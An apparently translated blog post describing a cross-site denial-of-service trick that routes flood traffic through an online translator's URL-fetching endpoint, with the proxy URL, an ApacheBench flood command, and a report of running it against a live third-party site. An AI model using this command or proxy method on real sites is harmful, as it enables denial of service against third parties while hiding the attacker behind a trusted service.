Crossite dos

Preamble

Nowadays, the global network is growing by leaps and bounds. And along with it, the number of web applications that integrate each other based on the HTTP protocol is growing. But is such integration really safe?

In the light of recent events and in the process of searching for information on DoS and DDoS attacks, I came across an interesting opportunity, namely cross-site attacks. The essence of such an attack is simple - there are countless services on the network that allow you to access third-party Web sites. These are online-translators, image-hosting and other and other. And if this is a proven service that is trusted by many, having an extensive infrastructure and originally created for a large flow of traffic, not only respectable surfers can take advantage of this, but also “bad uncles” for their own benefit.

Experiment

The experiment of such an attack can be put on almost any service from which you can get a direct address to the site you are attacking.

In my case, the service donor was translate.ru.
')
The check service has become kotyachka.ru, which is now under multiple “user” attacks and flood storm. Actually, it was taken only because at this point in time, this site is very easy to get under the automatic IP address bar and you can view information about IPs that went into the ban directly on the main page.

The task of the experiment was the following - to make the provoked site kotyachka.ru accept the IP of the translate.ru service as the IP of the attacking computer.

After a bit of searching in the HTML page of the translation result on translate.ru, this line was found:

http ://www.translate.ru//url/translation.aspx?direction=er&template=General&autotranslate=on&transliterate=&showvariants=&sourceURL=http://some-url.com

As you can see, instead of the last parameter, you can specify any site available on the network.

What was done:

user ~ # ab -c 100 -n 1000 "http://www.translate.ru//url/translation.aspx?direction=er&template=General&autotranslate=on&transliterate=&showvariants=&sourceURL=http://kotyachka.ru"

I did not wait for the end of the "test" and stopped it around the middle.
It remains to check the contents of the main page kotyachka.ru:


And compare it with IP translate.ru:

user ~ # nslookup translate.ru
Non-authoritative answer:
Name: translate.ru
Address: 195.131.10.152

Bingo !!!

findings

It is not difficult to guess that the larger the network and the more intersite services we see in the future - the greater the danger that these same services can be used for completely uncharacteristic purposes and one fine moment “friend” can become an enemy.

And if for the same image-hosting it all depends on the angle of curvature of the hands of those who make them (such as checking the URL before sending it to a third-party server, and not checking the resulting file after the graber), then for online translators and other services that work directly with the content of the site are much sadder.

For intruders in this way there are only advantages. Even without going far, it can be said that a huge amount of work on creating a botnet with the aim of DoS attacks and its maintenance no longer requires powerful botnet coordination centers, there is no urgent need for a bulletproof hosting ... In general, the list can be continued, but this is not fundamental. Prospects are very bright.

Be carefull!